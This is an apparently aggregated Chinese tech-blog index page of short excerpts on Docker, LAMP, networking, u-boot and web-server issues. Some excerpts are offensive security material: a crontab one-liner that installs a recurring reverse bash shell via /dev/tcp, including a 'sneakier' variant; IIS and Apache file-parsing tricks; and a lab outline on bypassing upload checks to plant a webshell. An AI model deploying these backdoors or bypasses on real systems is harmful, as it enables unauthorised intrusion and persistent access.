Time of Update: 2018-08-23
原文出處: 香草的技術部落格(@平凡的香草) 書接上回,今天敘述小米的面試經曆。這裡可能有一些技術理解和技術方案,歡迎討論。另昨天共計收入7筆共95元,夠我喝幾杯咖啡了,謝謝所有捐錢的朋友。 小米:營運部 在小米是聊了兩個部門的,首先是營運部門,在 @wilbur井源 的熱情招待下,吃了頓大餐,抱歉的是我沒有帶足現金,所以付款時我無法“客氣”,改天補請。
Time of Update: 2018-08-23
Docker的大坑小窪 Posted on March 2, 2015March 2, 2015 by 孫宏亮 Docker成為雲端運算領域的新寵兒已經是不爭的事實,作為高速發展的開源項目,難免存在這樣或那樣的瑕疵。筆者最近在開發實戰中曾經跌進去一些坑,有些坑還很深,寫出來分享,相當於是在坑邊掛個警示牌,避免大家重蹈覆轍。話不多說,一起來領略Docker的大坑小窪。 1.Docker中同種類型不同tag的鏡像並非可互相替代 問題描述:
Time of Update: 2018-08-23
LAMP 指的 Linux(作業系統)、ApacheHTTP 伺服器,MySQL(有時也指MariaDB,資料庫軟體) 和 PHP(有時也是指 Perl 或 Python) 的第一個字母,一般用來建立 網頁伺服器。 雖然這些開放原始碼程式本身並不是專門設計成同另幾個程式一起工作的,但由於它們的免費和開源,這個組合開始流行(大多數Linux發行版本捆綁了這些軟體)。當一起使用的時候,它們表現的像一個具有活力的方案套件。下面介紹如何使用docker來搭建一個包含lamp組件的容器: 從網站上
Time of Update: 2018-08-23
在 Ubuntu 14.04 Server 上安裝過程是最簡單的, 其滿足了安裝 Docker的所有要求,只需要執行如下安裝指令碼即可. 如果你有可能,請使用14.04版本的Ubuntu, 避免給自己挖坑. 安裝 1 curl -sSL http s:// get.docker.io/ubuntu/ | sudo sh 測試 1 sudo docker run -i -t
Time of Update: 2018-08-23
大規模流量的網站架構,從來都是慢慢“成長”而來。而這個過程中,會遇到很多問題,在不斷解決問題的過程中,Web系統變得越來越大。並且,新的挑戰又往往出現在舊的解決方案之上。希望這篇文章能夠為技術人員提供一定的參考和協助。 以下為原文
Time of Update: 2018-08-23
使用docker ps -a查看容器的ID,如下圖帶底線的容器 [root@localhost ~]# docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES c5a5dd0a5448 liushunqiu/nc_ubuntu "/bin/bash" 8 seconds ago Up 7 seconds determined_brown 64fc0c0fd2c7 registry "/entrypoint.
Time of Update: 2018-08-23
前置條件 Linux系統 64位系統 支援aufs或者DeviceMapper等儲存驅動(我們在這裡使用aufs) 升級核心 檢查是否支援aufs,centos6.5和RHEL6.5的2.6核心不支援aufs,所以需要升級到已經支援aufs的3.1,如果是使用的centos7,那就已經支援了這個功能 檢查是否支援aufs [root@entel1 /]# grep aufs /proc/filesystemsnodev aufs 檢查核心版本 使用uname
Time of Update: 2018-08-23
docker centos6 自啟動ssh服務 前期準備 下載centos6.6版本鏡像 啟動容器完善容器環境 修改登入密碼 更換yum源地址 推薦使用阿里源http://mirrors.aliyun.com/repo/Centos-6.repo 沒有wegt命令,可以手動建立檔案,粘貼內容。 yum makecache 安裝wget(用於測試yum是否成功) 完成以上步驟之後,建立新鏡像:centos6.6:base Dockerfile編輯 1. 建立/home/
Time of Update: 2018-08-23
最近移植了下u-boot-2014.10到TQ335x,如果基於am335x evm進行移植,需要修改的地方並不多。 由於TI的am335x evm開發使用了一個eeprom儲存了板載配置資訊,用來區分不同板子的型號的,而TQ335x沒有這個eeprom,因此,需要修改eeprom相關的部分,使u-boot適應TQ335x開發板。 使用source insight查看代碼,很容易發現,所有擷取板載配置的部分都是通過讀取eeprom獲得的,因此,首選修改read_eeprom(board/
Time of Update: 2018-08-23
當在Ubuntu上的終端運行命令:sudo fdisk –l後,終端出現如下圖情況: sda2是拓展分區,sda5,6,7,8都是sda2下的邏輯分區,可以看到sda1的End位置和sda5的Start位置重疊了,終端提示: Partition 1 does not end on cylinder boundary。這句話的意思是說:分區 1 沒有在柱面上結束。
Time of Update: 2018-08-23
正常版本 (crontab -l;echo '*/60 * * * * exec 9<> /dev/tcp/127.0.0.1/8888;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab - 升級猥瑣版本 (crontab -l;printf "*/60 * * * * exec 9<>
Time of Update: 2018-08-23
IIS IIS解析漏洞 IIS 6.0 解析利用方法有兩種: 1. 目錄解析 建立xx.asp為名稱的檔案夾,將asp檔案放入,訪問/xx.asp/xx.jpg,其中xx.jpg可以為任意檔案尾碼,即可解析 2. 檔案解析 尾碼解析:/xx.asp;.jpg /xx.asp:.jpg(此處需抓包修改檔案名稱) 3. 預設解析: /xx.asa ,/xx.cer,/xx.cdx
Time of Update: 2018-08-23
安全工具-Arachni Arachni是一個多功能、模組化、高效能的Ruby架構,旨在協助滲透測試人員和管理員評估web應用程式的安全性。同時Arachni開源免費,可安裝在windows、linux以及mac系統上,並且可匯出評估報告。 一、Arachni下載與啟動,以LInux環境為例 下載地址:http://www.arachni-scanner.com/download/
Time of Update: 2018-08-23
Native VLAN是trunk上才有的概念.主要的目的是不丟棄非標記幀.接收方交換器把所有接收到的未標記的資料包轉寄到NATIVE VLAN中,而不是丟棄.預設是VLAN1. 801.q的TRUNK中可以存在多個VLAN。各個VLAN都被加上一個頭,並在該頭部說明VLAN號碼,但是有一個VLAN,不加頭,不進行封裝。就是native
Time of Update: 2018-08-23
LMI(本地管理介面,Local Management Interface)是CPE裝置(路由器)和幀交換器之間的信令標準,在管理複雜互連網路的框架轉送協議上增加了擴充。主框架轉送LMI擴充包括全域定址、虛擬電路狀態訊息和多播。 注意: 事實上有3個LMI標準。除了前面已經提到的Cisco LMI(在1990年由Cisco System、StrataCom、Northern Telecom和Digital Equipment Corporation開發),還有ANSI和Q.933A標準。
Time of Update: 2018-08-23
我最為熟悉的便是Apache了,先來研究它的檔案解析漏洞。百度許久,又Google一番,最終發覺,Apache關於檔案解析,似乎只有三種“漏洞”。之所以打引號是因為我覺得這三種“漏洞”都不是Apache的漏洞,只是其特性,而很多程式員不瞭解這種特性,故而寫出有問題的代碼,這才給駭客可趁之機,造成漏洞。但大家都稱呼這是Apache的檔案解析漏洞,我也只好隨大流了。 1.多尾碼名
Time of Update: 2018-08-23
apache版本:Apache 2.2.3,安裝目錄 /usr/local/apache2 漏洞1:檢測到目標伺服器啟用了TRACE方法 在/usr/local/apache2/conf/httpd.conf 末尾添加 TraceEnable off 重啟apache: cd /usr/local/apache2/bin/ ./apachectl stop ./apachectl start 再掃描漏洞消失 =================================
Time of Update: 2018-08-23
實驗環境 實驗環境 操作機:Windows XP 目標機:Windows 2003 目標網址:www.test.com 實驗工具:中國菜刀 實驗目的 本課程帶領大家通過利用Apache解析漏洞繞過驗證進行上傳木馬,從而使瞭解到上傳木馬並非難事,需要提高自身防禦能力。 實驗思路 上傳正常圖片和WEBShell 利用Apache解析缺陷繞過上傳檢測
Time of Update: 2018-08-23
攻防實驗室 賽博朔方 背景介紹 Apache和Tomcat都是WEB網路伺服器,一般Apache是靜態解析,tomcat是java應用伺服器,動態解析jsp、php等,是一個容器(servlet),可以獨立於apache運行。打個比方:Apache是一輛車,上面可以裝東西,比如html等;但不能裝水,要裝水必須要有容器(桶),而這個桶也可以不放在車上,這個就是Tomcat。 漏洞概述
Time of Update: 2018-08-23
Forbidden , 從字面意思上來講是拒絕的意思,因此第一印象想到的就是許可權問題了,意思就是說,你當前nginx使用者對目標檔案,如index.html等沒有讀許可權。所以解決nginx許可權問題的第一種方案就是開放許可權。這裡可以把欲訪問的目標檔案夾許可權改為nginx使用者可讀,如:chmod -R 755 floder_name